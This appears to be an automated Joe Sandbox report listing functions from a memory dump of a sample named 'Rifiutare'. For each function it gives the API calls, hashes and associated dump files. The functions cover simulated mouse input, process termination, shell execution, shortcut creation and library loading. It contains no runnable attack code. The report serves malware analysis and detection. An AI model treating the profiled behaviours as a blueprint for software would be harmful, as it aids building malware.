Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: b4336a0fb7be5f0f7e7d26df8c3af7ac79e061469ddd945e9d340ffab15fd5fd
Instruction ID: 3476d5e4df8870a9c0ec43f2fe55f5306cd40ffe854e45551ddb03982dd85293
Opcode Fuzzy Hash: b4336a0fb7be5f0f7e7d26df8c3af7ac79e061469ddd945e9d340ffab15fd5fd
Instruction Fuzzy Hash: D8318D71900205ABCB00AF94DC89FAEB7B8FF45310F2880A5FD00EB246DB70DA55DB64

Function 00CB2B20 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00CB2B2E

Part of subcall function 00CAED1C: GetWindowRect.USER32(?,?), ref: 00CAED34

GetDesktopWindow.USER32 ref: 00CB2B58
GetWindowRect.USER32(00000000), ref: 00CB2B5F
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00CB2B91

Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA

GetCursorPos.USER32(?), ref: 00CB2BBD
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CB2C1B

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 47090b74002f2b883336d20548ab3f4c7d670b5b9d92164c9a80f405729e788c
Instruction ID: ed006285d224521e9856ccf01a88e40339d5faec12409cb08da1847ba65e80de
Opcode Fuzzy Hash: 47090b74002f2b883336d20548ab3f4c7d670b5b9d92164c9a80f405729e788c
Instruction Fuzzy Hash: EF31B072505306AFD720DF54C849F9FB7A9FF89318F000929F59AA7191DA70EA09CB92

Function 00C95499 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C954B1
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C954CE
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C95506
_wcslen.LIBCMT ref: 00C95524
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C9552C
_wcsstr.LIBVCRUNTIME ref: 00C95536

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 323c437c53e496270ad22023b03b27626afd220cb5b20a3e99c857e6fe8c5cd1
Instruction ID: e19e7f1b2207fff893273f1dcbfc873d9069a3759e585c53c2fab4426e64f5ca
Opcode Fuzzy Hash: 323c437c53e496270ad22023b03b27626afd220cb5b20a3e99c857e6fe8c5cd1
Instruction Fuzzy Hash: 6C21FF72204600AAEF165B69DC0DF7F7BA9DF45761F108069FC0ACA192EA70DD81E7A0

Function 00CA6135 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C350F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C35035,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C35117

_wcslen.LIBCMT ref: 00CA6192
CoInitialize.OLE32(00000000), ref: 00CA62AC
CoCreateInstance.OLE32(00CD0CBC,00000000,00000001,00CD0B2C,?), ref: 00CA62C5
CoUninitialize.OLE32 ref: 00CA62E3

Strings

.lnk, xrefs: 00CA618D, 00CA61D8, 00CA629C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: fd9f1269c535e9a1afa0ab7747b846590ebf2e016b2545d31805ed6778cc11a6
Instruction ID: 0b40e93977a7445723a23a5afe71a72e5d4a048cf10a357f2e11d2335de62644
Opcode Fuzzy Hash: fd9f1269c535e9a1afa0ab7747b846590ebf2e016b2545d31805ed6778cc11a6
Instruction Fuzzy Hash: C5D142716043029FC714DF24C484A2ABBE5FF8A718F18895DF89AAB361D731ED45CB92

Function 00CC82A9 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00CC82ED
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CC8312
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CC832A
GetSystemMetrics.USER32(00000004), ref: 00CC8353
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CABFE0,00000000), ref: 00CC8373

Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2

GetSystemMetrics.USER32(00000004), ref: 00CC835E

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 0b2163794c9307320989c8bfb29b4ce813ed9e9776e47957fb01858e3eba6f6a
Instruction ID: 7249fffd8c13e409a89b8877b481a555129ecdea21d0b5529a0bc79e5ddc0404
Opcode Fuzzy Hash: 0b2163794c9307320989c8bfb29b4ce813ed9e9776e47957fb01858e3eba6f6a
Instruction Fuzzy Hash: 14216971610681AFCB149F79DC08F6B3BA4FB85B25F184A2DF926C22F0DA30D954DB10

Function 00C537A2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C53799,00C53405), ref: 00C537B0
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C537BE
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C537D7
SetLastError.KERNEL32(00000000,?,00C53799,00C53405), ref: 00C53829

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e109c71b1e258ebb071f1303d85b22c1b046e5c1f5893d82fe51c7c27de24ad4
Instruction ID: e29801424a7afee92487f0304bc5b8b46b30c589697b5ac49a1761ad63569386
Opcode Fuzzy Hash: e109c71b1e258ebb071f1303d85b22c1b046e5c1f5893d82fe51c7c27de24ad4
Instruction Fuzzy Hash: 9801287A6097511EA62926B4BC85B2A2794EB083F3B20023AF822410F1EE114E8AB14C

Function 00C63194 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C54E03,?,00000002,?,00C559A6,00C56714), ref: 00C63198
_free.LIBCMT ref: 00C631CB
_free.LIBCMT ref: 00C631F3
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C56714,00000000), ref: 00C63200
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C56714,00000000), ref: 00C6320C
_abort.LIBCMT ref: 00C63212

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ed3aad829e4278bd0729ba0803a985bcd0cdf8b475fee914f466de3d0b0e94d8
Instruction ID: 4245ad20869053acd21d17a2076f431e92938ad41b522539fee1ecb3d2bd35f3
Opcode Fuzzy Hash: ed3aad829e4278bd0729ba0803a985bcd0cdf8b475fee914f466de3d0b0e94d8
Instruction Fuzzy Hash: 40F0CD3554498067C6323735ACC9F5E16699FC2770F250524F836D21A1EF25CB06A121

Function 00CC902C Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00C31E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C31EDC
Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31EEB
Part of subcall function 00C31E82: BeginPath.GDI32(?), ref: 00C31F02
Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31F2B

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CC9056
LineTo.GDI32(?,00000003,00000000), ref: 00CC906A
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CC9078
LineTo.GDI32(?,00000000,00000003), ref: 00CC9088
EndPath.GDI32(?), ref: 00CC9098
StrokePath.GDI32(?), ref: 00CC90A8

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 054fba9e78b8d63b510926f4b5625ff1ffb9a6f2a2344ad984003d8809c41fe0
Instruction ID: ccb7e7820d2337e845d2e264760de1e3b5dae4ad11b3b1ee11c53718fba964fd
Opcode Fuzzy Hash: 054fba9e78b8d63b510926f4b5625ff1ffb9a6f2a2344ad984003d8809c41fe0
Instruction Fuzzy Hash: B911C97200010DBFEB129F94DC88FAE7F6DEB08354F048026FA5A9A161D7729E55DBA0

Function 00C33700 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C33731
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C33739
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C33744
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C3374F
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C33757
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3375F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 64f8c52b9afd1e87bbe9bd6bea8b7c515ff547ce7b61ce939eeb4d9de09f593b
Instruction ID: 5a08f2f2d17bca32a3d7e529c96aaa58146b1665d641717b4078088897bbd202
Opcode Fuzzy Hash: 64f8c52b9afd1e87bbe9bd6bea8b7c515ff547ce7b61ce939eeb4d9de09f593b
Instruction Fuzzy Hash: 7A0167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BE15C4BA42C7F5A864CBE5

Function 00C9F2F7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C9F307
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C9F31D
GetWindowThreadProcessId.USER32(?,?), ref: 00C9F32C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C9F33B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C9F345
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C9F34C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b62896bde25e5dd55a1ba6ac1d82a5a3492000ac8da940651354c722b8271109
Instruction ID: b277c2520c7cb4c35cef511bd15696046e2483f48893ead9f5a60637bbb8abf7
Opcode Fuzzy Hash: b62896bde25e5dd55a1ba6ac1d82a5a3492000ac8da940651354c722b8271109
Instruction Fuzzy Hash: 42F03072241158BBE7215752DC0EFEF7B7CEFC6B11F040068F606D1190D7A45A02C6B5

Function 00C730BE Relevance: 9.0, APIs: 6, Instructions: 38windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00C730D7
SendMessageW.USER32(?,00001328,00000000,?), ref: 00C730EE
GetWindowDC.USER32(?), ref: 00C730FA
GetPixel.GDI32(00000000,?,?), ref: 00C73109
ReleaseDC.USER32(?,00000000), ref: 00C7311B
GetSysColor.USER32(00000005), ref: 00C73135

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 50dd985ff54e1e4e7dd80a09e017d9bd6f8670960df1de5afb2d1cad9d5149d8
Instruction ID: 03e8896a574d3bac074e735ed6849fe075104aeec2b99742e2bbd2e4f245099f
Opcode Fuzzy Hash: 50dd985ff54e1e4e7dd80a09e017d9bd6f8670960df1de5afb2d1cad9d5149d8
Instruction Fuzzy Hash: 3E012472400246AFDB515BA0DC08FAEBBB5FB04321F514560FA2AA61A0CB310E51EB10

Function 00C9CD26 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C9CE44
_wcslen.LIBCMT ref: 00C9CE8B
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C9CEF2
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C9CF20

Strings

0, xrefs: 00C9CE05

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 2c4c786bffebbdd3dc1d50f4de33744ea22649cce7d8f4756f01069aafc92c48
Instruction ID: 3c451f55572fd377d46f6d4551c59f91127a52b7523558003b8d330f56cf1c15
Opcode Fuzzy Hash: 2c4c786bffebbdd3dc1d50f4de33744ea22649cce7d8f4756f01069aafc92c48
Instruction Fuzzy Hash: 5D51DE726183419BDB15DF68C8CDB7B7BE8AB49310F040A2DF9A9D31D0DB70CA489B56

Function 00CBB4E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00CBB623

Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11

GetProcessId.KERNEL32(00000000), ref: 00CBB6B8
CloseHandle.KERNEL32(00000000), ref: 00CBB6E7

Strings

<, xrefs: 00CBB5EB
@, xrefs: 00CBB5F2

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 69d97159882a77be210ba3b0afcd7f68ad038d98ed732492d27a42bd6152b4f0
Instruction ID: 71b9f98c98599b8885415e77c295f63db06e26fc12ae94b77e4405e58da9c445
Opcode Fuzzy Hash: 69d97159882a77be210ba3b0afcd7f68ad038d98ed732492d27a42bd6152b4f0
Instruction Fuzzy Hash: 7B715A75A10219DFCB24DF94C584A9DBBF0FF08310F048499E85AAB3A1CB74EE45CB95

Function 00CC4456 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC450F
IsMenu.USER32(?), ref: 00CC4524
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC456C
DrawMenuBar.USER32 ref: 00CC457F

Strings

0, xrefs: 00CC4463

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 86b91b732d8bdcc9cdce61313bdeea1e39847ec480e034d8b9c2152e47b8c27c
Instruction ID: 8c664176a832af8b0b3f10bcf133d0f7461da4c7aee2e05b8b8e709799da9a02
Opcode Fuzzy Hash: 86b91b732d8bdcc9cdce61313bdeea1e39847ec480e034d8b9c2152e47b8c27c
Instruction Fuzzy Hash: 574106B5A01209EFDB14CF95E894FAABBB8FB05354F048129F915A7250C730EE50DFA0

Function 00C925E2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C92666
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C92679
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C926A9

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

Strings

ListBox, xrefs: 00C92625
ComboBox, xrefs: 00C925F0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 5171c7e813a2908881ce63fc4530294a422c9827ee4ecc1460aed49a079d7588
Instruction ID: febbc0db2a4953927914d3bb1967023f6c60112da6f0d30db448474f969b6c45
Opcode Fuzzy Hash: 5171c7e813a2908881ce63fc4530294a422c9827ee4ecc1460aed49a079d7588
Instruction Fuzzy Hash: DB21D6719001087FDF19AB64DC4ADFFBBA8DF45350F104129F562A75E1DB78494AA720

Function 00CC35F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC3667
LoadLibraryW.KERNEL32(?), ref: 00CC366E
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC3683
DestroyWindow.USER32(?), ref: 00CC368B

Strings

SysAnimate32, xrefs: 00CC3642

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 69399a454550ce6198a502c019c09f6b2d83a2d17fc78a8478a8548ba195d2d6
Instruction ID: 41c6d4d86f48be422fd608ebc262803e1c026ce7bc584aca57a9a890d308554b
Opcode Fuzzy Hash: 69399a454550ce6198a502c019c09f6b2d83a2d17fc78a8478a8548ba195d2d6
Instruction Fuzzy Hash: 06219A71600345BBEF105F64EC88FBB37A9FB58364F208628FA65D6290C771CE9197A0

Function 00C5518D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C5513E,00000003,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002), ref: 00C551AD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C551C0
FreeLibrary.KERNEL32(00000000,?,?,?,00C5513E,00000003,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002,00000000), ref: 00C551E3

Strings

CorExitProcess, xrefs: 00C551B8
mscoree.dll, xrefs: 00C551A6

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

